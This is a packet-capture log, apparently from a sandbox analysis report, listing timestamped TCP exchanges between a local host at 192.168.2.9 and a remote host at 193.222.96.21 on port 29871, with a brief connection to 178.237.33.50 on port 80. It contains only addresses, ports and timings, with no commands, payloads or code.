Apr 24, 2024 07:13:20.883636951 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883651972 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883655071 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.883667946 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883681059 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883691072 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.883693933 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883708954 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883716106 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.883723021 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883737087 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883749962 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.883749962 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883768082 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883771896 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.883807898 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883821011 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883832932 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883838892 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.883857965 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.883872032 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.883909941 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.883935928 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.884037971 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.884074926 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.884090900 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.884212017 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.884259939 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.884308100 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.884388924 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.884429932 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:20.884483099 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.884537935 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:20.884574890 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.149216890 CEST | 80 | 49715 | 178.237.33.50 | 192.168.2.9 |
Apr 24, 2024 07:13:21.149293900 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50 |
Apr 24, 2024 07:13:21.190745115 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.190764904 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.190810919 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.190865040 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.190907001 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.190912008 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.190942049 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.190990925 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191006899 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191040039 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.191066027 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191113949 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.191128016 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191205025 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191246986 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.191266060 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191310883 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191355944 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.191390038 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191494942 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191541910 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.191571951 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191678047 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191724062 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.191756010 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191857100 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.191909075 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.191915035 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192028999 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192069054 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.192140102 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192302942 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192327023 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192394972 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192445993 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.192497015 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.192517996 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192603111 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192656040 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.192678928 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192737103 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192787886 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.192816019 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192873955 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192930937 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.192936897 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.192990065 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193041086 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.193049908 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193109035 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193170071 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.193170071 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193228960 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193281889 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193284988 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.193340063 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193387985 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193393946 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.193438053 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193483114 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193490982 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.193521023 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.193572998 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.491127014 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491240025 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491312027 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.491349936 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491405010 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491450071 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.491465092 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491559029 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491600037 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491650105 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.491653919 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491699934 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.491731882 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491791010 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491832018 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.491846085 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491890907 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.491938114 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.492055893 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492175102 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492213964 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492223024 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.492255926 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492300987 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.492326975 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492470026 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492511988 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.492563963 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492621899 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492681026 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.492712021 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492821932 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492868900 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.492877960 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.492968082 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493004084 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493031979 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493046045 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493103027 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493114948 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493146896 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493196964 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493202925 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493283033 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493319988 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493326902 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493370056 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493413925 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493437052 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493484974 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493539095 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493546009 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493607998 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493654966 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493658066 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493714094 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493757010 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493763924 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493896961 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.493943930 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.493959904 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494016886 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494065046 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.494113922 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494175911 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494210005 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.494277000 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494386911 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494434118 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.494438887 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494534016 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494585037 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.494715929 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494785070 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494837999 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.494848013 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494894981 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494942904 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.494945049 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.495064974 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495114088 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495115042 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.495188951 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495237112 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.495238066 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495294094 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495332003 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495341063 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.495404959 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495443106 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.495462894 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495501995 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495552063 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.495630026 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495810986 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495856047 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.495868921 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495908022 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.495953083 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.496046066 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496098042 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496161938 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.496211052 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496268988 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496306896 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496314049 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.496367931 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496412992 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.496462107 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496573925 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496627092 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.496634007 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496689081 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496726990 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496745110 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.496820927 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496865034 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.496912956 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.496969938 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.497023106 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.497029066 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.497282982 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.497323990 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.497472048 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.497526884 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.497570992 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.791573048 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.791642904 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.791699886 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.791707993 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.791759968 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.791799068 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.791801929 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.791856050 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.791894913 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.792000055 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792057037 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792097092 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.792169094 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792207003 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792248011 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.792263985 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792300940 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792356968 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.792496920 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792551994 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792603016 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.792676926 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792741060 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792785883 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.792845964 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792903900 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792959929 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.792984962 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.793035030 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793082952 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.793092966 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793148041 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793184996 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793193102 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.793222904 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793270111 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.793658018 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793711901 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793759108 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.793785095 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793874025 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.793919086 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.794051886 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.794329882 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.794378996 CEST | 49714 | 29871 | 192.168.2.9 | 193.222.96.21 |
Apr 24, 2024 07:13:21.794420004 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
Apr 24, 2024 07:13:21.794500113 CEST | 29871 | 49714 | 193.222.96.21 | 192.168.2.9 |
